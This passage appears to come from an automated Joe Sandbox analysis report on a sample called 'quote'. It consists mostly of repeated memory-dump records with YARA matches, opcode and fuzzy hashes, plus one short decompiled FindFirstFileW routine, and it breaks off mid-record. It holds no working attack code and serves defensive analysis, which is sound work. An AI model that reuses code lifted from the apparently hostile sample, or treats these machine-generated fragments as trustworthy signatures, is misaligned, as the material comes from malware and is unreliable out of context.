                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 2e26d3715ff2cf6343e45b81550be6c3b2fe3b4232edee0b8df5c1ad2d09dc52
                                                                                      • Instruction ID: a9b45237e53d63405296b26c40e5c2220dd67fae79b9c47569d02b2897589813
                                                                                      • Opcode Fuzzy Hash: 2e26d3715ff2cf6343e45b81550be6c3b2fe3b4232edee0b8df5c1ad2d09dc52
                                                                                      • Instruction Fuzzy Hash: 58B10EA3D3E35688E7933032C5583A196D0DF2718AE22CB1ADC37B1561371F4A8E84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 3e026ed1452d8734d2950cf9d92b301607dcac7aac1933a1f8b5be0db49494de
                                                                                      • Instruction ID: abb7339a809c14317dfd4d59a1698c26ec9db7d8abace7da8dd3841a8f7b4760
                                                                                      • Opcode Fuzzy Hash: 3e026ed1452d8734d2950cf9d92b301607dcac7aac1933a1f8b5be0db49494de
                                                                                      • Instruction Fuzzy Hash: 20B1BB56E2F71598DB933073C1013E15AC0DF1348AE69CB2BDC2A725A17B6F4A4F89C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 1126e7705c2a454e83d4aa9ae536415d1f142a934cc044c96cdd0ca3d272d63f
                                                                                      • Instruction ID: 01f781240ad26bcdb4e5d21c2703d78056ffbd927bcb31477f32558c41e6c220
                                                                                      • Opcode Fuzzy Hash: 1126e7705c2a454e83d4aa9ae536415d1f142a934cc044c96cdd0ca3d272d63f
                                                                                      • Instruction Fuzzy Hash: C5A10FB3E3E35688E7933032C5587A19690DF2718AF22CB1ADC37B1561771F4A8E84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 2a34a39798a77923448682a3791d50964c3a49fd1391d576baa925540f114220
                                                                                      • Instruction ID: a8dcc56a0463ab69cb5487c466ebf750978c87c3a080d69cc62c3bac64ae3549
                                                                                      • Opcode Fuzzy Hash: 2a34a39798a77923448682a3791d50964c3a49fd1391d576baa925540f114220
                                                                                      • Instruction Fuzzy Hash: F881DC62E2F71598EB933072C1513F15AD0CF1308AE69C72ADC2AB25A17B6F4A4FC585
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 09b5c6967462bd0cb8798a255fa4e73f39f38bfdb2c14d7cfb7e24a005e567e4
                                                                                      • Instruction ID: 5e96a2297095474d23749057729005f71229479179ab9b3f33546f5396ca9407
                                                                                      • Opcode Fuzzy Hash: 09b5c6967462bd0cb8798a255fa4e73f39f38bfdb2c14d7cfb7e24a005e567e4
                                                                                      • Instruction Fuzzy Hash: FC91CD62E3F71598EB933072C5513F15AD0CF1308AE69C71ACC2AB24A1BB6F4A4FC584
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: df7f3b96436b6f1cdcfe3efc15359bd1829a64f30e8dd7024108f9ee8333956d
                                                                                      • Instruction ID: 36a24c227f400f79cf8b1edae1295f6d2e0c7381058c462147c5f5c2aaeaedc6
                                                                                      • Opcode Fuzzy Hash: df7f3b96436b6f1cdcfe3efc15359bd1829a64f30e8dd7024108f9ee8333956d
                                                                                      • Instruction Fuzzy Hash: 63910EA7E3F35688E7837032C5583A19690DF2B18AF22CB1ADC3771561771F4A8E84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: cc72b88b63cda8765b70d8d758cdd3845650b4577ea385b8380901d4feb3edf4
                                                                                      • Instruction ID: fca560f2119f740c378d7aa25316a0b9dc146a0606fd2e9673f144b312a83cd5
                                                                                      • Opcode Fuzzy Hash: cc72b88b63cda8765b70d8d758cdd3845650b4577ea385b8380901d4feb3edf4
                                                                                      • Instruction Fuzzy Hash: AEA1AB62E2F71599DB933072C1513E156D0CF1348AE69CB2BDC2AB24A17B6F4A4FC9C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 341232adab9972f72688eed6c32ad35f31d0492a2d9da3de197b1848e08bb9a5
                                                                                      • Instruction ID: a22cdf54470687914bda469cc13a5beb578b2b781c639d4c705b31d658fe26a6
                                                                                      • Opcode Fuzzy Hash: 341232adab9972f72688eed6c32ad35f31d0492a2d9da3de197b1848e08bb9a5
                                                                                      • Instruction Fuzzy Hash: 94A100A3D3E75288E7837032C5583A19690DF2B18AF22CB1ADC33715A1771F4A8E84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: aa1fe3f7e7c59420286f335fd1c44056c79395620b899c62d58319eb2c3ce119
                                                                                      • Instruction ID: b4f9c70ca225c058daf5d686c8ef5aa7d8a54a7e5858402d1f75ad41918cfa8c
                                                                                      • Opcode Fuzzy Hash: aa1fe3f7e7c59420286f335fd1c44056c79395620b899c62d58319eb2c3ce119
                                                                                      • Instruction Fuzzy Hash: 4091BB56E3F31598DB933072C1513E15AC0CF1348AE69CB2ADC2AB25A17B6F4A4F8584
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 32e66db3ab9e34e092811020d4d6bc68a20baf668dce00e1184f8863048ec030
                                                                                      • Instruction ID: 9bd7fd70907357982ec7200631feda6011cca40684df755c4a2572ff1e982702
                                                                                      • Opcode Fuzzy Hash: 32e66db3ab9e34e092811020d4d6bc68a20baf668dce00e1184f8863048ec030
                                                                                      • Instruction Fuzzy Hash: 5981F2A7E3A75688E7837032C5583E29680DF2718AF21CB16DC33705A1772F4A8DC4D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 2b0a4527befc69d49423b25827dc9647f3af7c714ff72ee45516856635288d34
                                                                                      • Instruction ID: 1668b7b8afb67d129b4a2bb16f4d6dbfaaafea35ca728c1eca3d5d1486cd625f
                                                                                      • Opcode Fuzzy Hash: 2b0a4527befc69d49423b25827dc9647f3af7c714ff72ee45516856635288d34
                                                                                      • Instruction Fuzzy Hash: C3A1FEB3D3E35288E7937032C5587A19690DF2718AF22CB1ADC33B1561771F4A8E84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 1dc52e1df28aef32b04880d85bba68ef007a2d8e0661685aff32baff111c05c6
                                                                                      • Instruction ID: 86945da2551fec0ba7c59dc8ea6adb84384c730150ae3c3fe5c1f4ff0677be4d
                                                                                      • Opcode Fuzzy Hash: 1dc52e1df28aef32b04880d85bba68ef007a2d8e0661685aff32baff111c05c6
                                                                                      • Instruction Fuzzy Hash: FE71ED62E2F71599EB933072C1523F16AD0CF1318AE59C71BCC2AB2461BB6F4A4FC585
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 9117338df41a66846bf5e0479a4d7378dcc9a0a44946e6d67b64885a58db858d
                                                                                      • Instruction ID: 67398335776a12bfcf4de4a5098c5c4044930ed274ff94712ff33e16fea32d0e
                                                                                      • Opcode Fuzzy Hash: 9117338df41a66846bf5e0479a4d7378dcc9a0a44946e6d67b64885a58db858d
                                                                                      • Instruction Fuzzy Hash: 7981DB62E3F71598EB933072C1513F15AD0CF1348AE69C72ACC2AB2561BB6F4A4FC585
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: b16e3575d0fdcd389f09db8cff458be563e2d475122e11e51a104d8ec76d82aa
                                                                                      • Instruction ID: cc437265aecf74c3879a9c1666148d12ebad420128dfb635865994116d39514c
                                                                                      • Opcode Fuzzy Hash: b16e3575d0fdcd389f09db8cff458be563e2d475122e11e51a104d8ec76d82aa
                                                                                      • Instruction Fuzzy Hash: 4D81F0A7D3A75688E7837032C5583E29680DF2718AE22CB1ADC37705A2771F4A8D84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 106178b90769d46a68bbef3cc0438fd614aba2c0ff346ec570c1664087c65131
                                                                                      • Instruction ID: f56c1ad72f71b7cb7779a55c2eb1020578a3b908ddd6cbed871250c55549639b
                                                                                      • Opcode Fuzzy Hash: 106178b90769d46a68bbef3cc0438fd614aba2c0ff346ec570c1664087c65131
                                                                                      • Instruction Fuzzy Hash: 7B91F0A7D3E75688E7837032C5583E2A690DF2718AF22CB1ADC3371561772F4A8D84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 22a970bb828b3969cbd70abfa5dd9599dda1241db465756605b97a143e005a36
                                                                                      • Instruction ID: 68a14f0ae8851d164478cab74735fb46987e93a50a56efef008f0f85f001c298
                                                                                      • Opcode Fuzzy Hash: 22a970bb828b3969cbd70abfa5dd9599dda1241db465756605b97a143e005a36
                                                                                      • Instruction Fuzzy Hash: 4A81F1A7D3E75688E7837032C5583E19680DF2718AE22CB1ADC33705A1771F4A8D84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 19d4fa1b3adc9a2a24a2823595506b7c732896444b8d0632bbad458e4367e2fc
                                                                                      • Instruction ID: eb622f5c37650b6c9cc428f8868201c5b48258189cd48e94c98e07cae8eb699c
                                                                                      • Opcode Fuzzy Hash: 19d4fa1b3adc9a2a24a2823595506b7c732896444b8d0632bbad458e4367e2fc
                                                                                      • Instruction Fuzzy Hash: 0781F1A7D3A75688E7837032C5583E29680DF2718AE22CB16DC37705A2772F4A8D84D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 4e1382de3f8cd83ddfca11c4cc2bd1005f487014c43ce7a34fac0c5e5c88ade0
                                                                                      • Instruction ID: ea6f8dc82638391f7ce311e1a1ec8f45b97b0afe9bccc2f9e873a5935a2f5731
                                                                                      • Opcode Fuzzy Hash: 4e1382de3f8cd83ddfca11c4cc2bd1005f487014c43ce7a34fac0c5e5c88ade0
                                                                                      • Instruction Fuzzy Hash: 6A81DD62E2F71598EB933072C1513F15AD0CF1308AE69C72BDC2AB2561BB6F4A4FC585
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: a5b7877985f3ae37ca1fd6f72396a6e81e12ce17a0b5d54be0777f990e0caf21
                                                                                      • Instruction ID: 9833be8f5a1ea86e453802fdfb6263f3944c8b09c67a77a0ece86681008a6626
                                                                                      • Opcode Fuzzy Hash: a5b7877985f3ae37ca1fd6f72396a6e81e12ce17a0b5d54be0777f990e0caf21
                                                                                      • Instruction Fuzzy Hash: 1891CC56E3F71598EB933072C5513F15AD0CF1308AE69CB2ADC2AB24A17B6F4A4FC584
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 41d9769bbdf006ad4513ba34060c36815efc18d0a01643594f95fa30fe7c1290
                                                                                      • Instruction ID: 5ad97bccd22ca2de6ea9dc4d20617969e2178ce63b4bc558865670a7b021e035
                                                                                      • Opcode Fuzzy Hash: 41d9769bbdf006ad4513ba34060c36815efc18d0a01643594f95fa30fe7c1290
                                                                                      • Instruction Fuzzy Hash: BC61FCA2E2F71598EB937073C1113F166D0CF1318AE69C71BCC2A72461BB6F4A4BC485
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 463fbab8e6e75cb5d228f94627cb2e1f34ce7e6ad607b33626864a7ce4922961
                                                                                      • Instruction ID: 8fc4232b7f0527679e3937407177c3eec461127dd5509cf3113cef12d3a9729d
                                                                                      • Opcode Fuzzy Hash: 463fbab8e6e75cb5d228f94627cb2e1f34ce7e6ad607b33626864a7ce4922961
                                                                                      • Instruction Fuzzy Hash: FB61B9E6D2E71489D663347285413B926D0CF5214EE5DC72BDC3FB20A1ABBB474BC581
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 39%
                                                                                      			E00402902(short __ebx, short* __edi) {
                                                                                      				void* _t21;
                                                                                      
                                                                                      				if(FindFirstFileW(E00402D3E(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                                      					E00406358( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                      					_push(_t21 - 0x2b0);
                                                                                      					_push(__edi);
                                                                                      					E00406411();
                                                                                      				} else {
                                                                                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                      					 *__edi = __ebx;
                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t21 - 4));
                                                                                      				return 0;
                                                                                      			}




                                                                                      0x0040291a
                                                                                      0x00402935
                                                                                      0x00402940
                                                                                      0x00402941
                                                                                      0x00402a7b
                                                                                      0x0040291c
                                                                                      0x0040291f
                                                                                      0x00402922
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 86c01df3adf26d2ad62d0a92cdacda52cc7b51b645ff98713a27207a5696fbd8
                                                                                      • Instruction ID: 56039e75b3af19f60320d449630e93dfdbb15a7187211f692f50db0849c99601
                                                                                      • Opcode Fuzzy Hash: 86c01df3adf26d2ad62d0a92cdacda52cc7b51b645ff98713a27207a5696fbd8
                                                                                      • Instruction Fuzzy Hash: C8F08C71A04114AEC700DFA4DD499AEB378EF10328F70457BE511F31E0D7B89E119B29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: ea5b57f31b243af5c0043caafff9f9a5afd00c873c82a14c0661b932dfe041af
                                                                                      • Instruction ID: c50fed702b85a929662468c58fedb1ca625f7a2711d9cd974047cd0824e30d1e
                                                                                      • Opcode Fuzzy Hash: ea5b57f31b243af5c0043caafff9f9a5afd00c873c82a14c0661b932dfe041af
                                                                                      • Instruction Fuzzy Hash: 5A51DD62E2F71598E7937072D1113F166D0CF1318AE69C71BCC2AB2461BB6F4A4FC485
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :CYe
                                                                                      • API String ID: 0-2595194762
                                                                                      • Opcode ID: d8909bdbab2fadd25cfd298aa953625302d4ae420fc2cb79989a2de9e6f3f4a9
                                                                                      • Instruction ID: a4f300647a25c9fb9a2abb40d47c60292265dc12744285264bedcc552a38fd2d
                                                                                      • Opcode Fuzzy Hash: d8909bdbab2fadd25cfd298aa953625302d4ae420fc2cb79989a2de9e6f3f4a9
                                                                                      • Instruction Fuzzy Hash: ADA10571A4439ADFDB349E2889DA3DA37A2EF49390F59412ECC8D8B205D3704B85CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: c827ca71a94561fc7e266028569e68ea0353fdb6a23ed844e277a58e61fae841
                                                                                      • Instruction ID: 77647cfd441495d0e300a94edb6dfacbac54de3babfcb5dc8826aed0f518ced9
                                                                                      • Opcode Fuzzy Hash: c827ca71a94561fc7e266028569e68ea0353fdb6a23ed844e277a58e61fae841
                                                                                      • Instruction Fuzzy Hash: CB510E62E3FB1598DB537072C5523F166D0CF13189E59C72BDC2BB2051BB6F4A8AC481
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: de32114d063609174c0dd28ec11e5593f6644bd1470600ad4f9cb114d419ceb5
                                                                                      • Instruction ID: 33ff07dc869a3be4a61cecc65a4b6f46767aa13140d643e0db53c74d8f328df6
                                                                                      • Opcode Fuzzy Hash: de32114d063609174c0dd28ec11e5593f6644bd1470600ad4f9cb114d419ceb5
                                                                                      • Instruction Fuzzy Hash: 4C61FD62E2F71598DB833472C1523F166D0CF1318AE19C71BCC2AB2461BB6F4A4FC484
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 03f0e896ff1ac867300c1a9f176b61c7b5129fcfb29fc7450e859056fc7615f9
                                                                                      • Instruction ID: 44e88522bbda4fd458ff80d253264e18bccb9707eebf4c24880cdf895520d3de
                                                                                      • Opcode Fuzzy Hash: 03f0e896ff1ac867300c1a9f176b61c7b5129fcfb29fc7450e859056fc7615f9
                                                                                      • Instruction Fuzzy Hash: 2251EB62E2E71598EB937072D1523F166D0CF13189F69C71BDC2BB2461BB6F4A8BC481
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: a47d7a9ecacf1dec181f3c6cccf8babffbfa46758323b33392feee04c62c6a78
                                                                                      • Instruction ID: dd930cda1d235d4d74edd8112e8dd015934041c980b3af0daaf125c87e506c9b
